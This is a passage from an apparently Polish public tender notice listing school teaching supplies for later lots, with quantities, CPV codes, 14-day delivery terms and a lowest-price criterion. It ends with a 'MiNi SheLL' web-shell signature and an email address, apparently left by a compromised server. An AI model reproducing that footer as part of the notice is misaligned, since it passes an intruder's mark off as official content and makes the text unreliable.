Zakup zestawu do decoupagu na zajęcia ze sztuki dla 12 uczniów	osoby	12
Zakup instrumentów perkusyjnych na zajęcia ze sztuki (trójkąty, grzechotki, tamburyny)	sztuki	12
Zakup książek przyrodniczych na zajęcia przyrodnicze	sztuki	8
Zakup lup na zajęcia przyrodnicze	sztuki	8
Zakup farb do twarzy na zajęcia teatralno-wokalne	sztuki	10
Zakup programów komputerowych na zajęcia z matematyki	sztuki	4
Zakup zbiorów zadań na zajęcia z matematyki	sztuki	8
Zakup gier logiczno-manipulacyjnych na zajęcia z matematyki	sztuki	12
Zakup książek na zajęcia biblijne	sztuki	8
Zakup map na zajęcia biblijne	sztuki	2
Zakup materiałów papierniczych na zajęcia biblijne dla 14 uczniów	osoby	14
Zakup zestawów doświadczalnych na zajęcia fizyczne	zestaw	4
Zakup słowników na zajęcia z j. angielskiego	sztuki	8
Zakup lektur szkolnych po angielsku na zajęcia z j. angielskiego	sztuki	5
Zakup słownika kolokacji na zajęcia z j. angielskiego	sztuki	1
Zakup ćwiczeń słuchowych na płytach CD na zajęcia z j. angielskiego	sztuki	10
Zakup kolorowych kartonów na zajęcia z j. angielskiego	sztuki	20
Zakup mikrofonów na zajęcia teatralne, teatralno-wokalne i zajęcia z chóru	sztuki	10
Zakup keyborda na zajęcia z chóru	sztuki	1
Zakup śpiewników na zajęcia z chóru	sztuki	30
Zakup materiałów papierniczych  i pasmanteryjnych na warsztaty plastyczne dla 20 uczniów	osoby	20
Zakup papieru ksero	ryza	50
Zakup ekranu projekcyjnego	sztuki	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.20.00-5, 37.31.00.00-4, 48.19.00.00-6, 22.11.00.00-4, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa materiałów dydaktycznych niezbędne do realizacji wsparcia pedagogiczno-psychologicznego w ZSP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup chusty animacyjnej	komplet	1
Zakup gier i puzzli edukacyjnych	sztuki	15
Zakup materiałów papierniczych na zajęcia dla 42 uczniów	sztuki	42.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com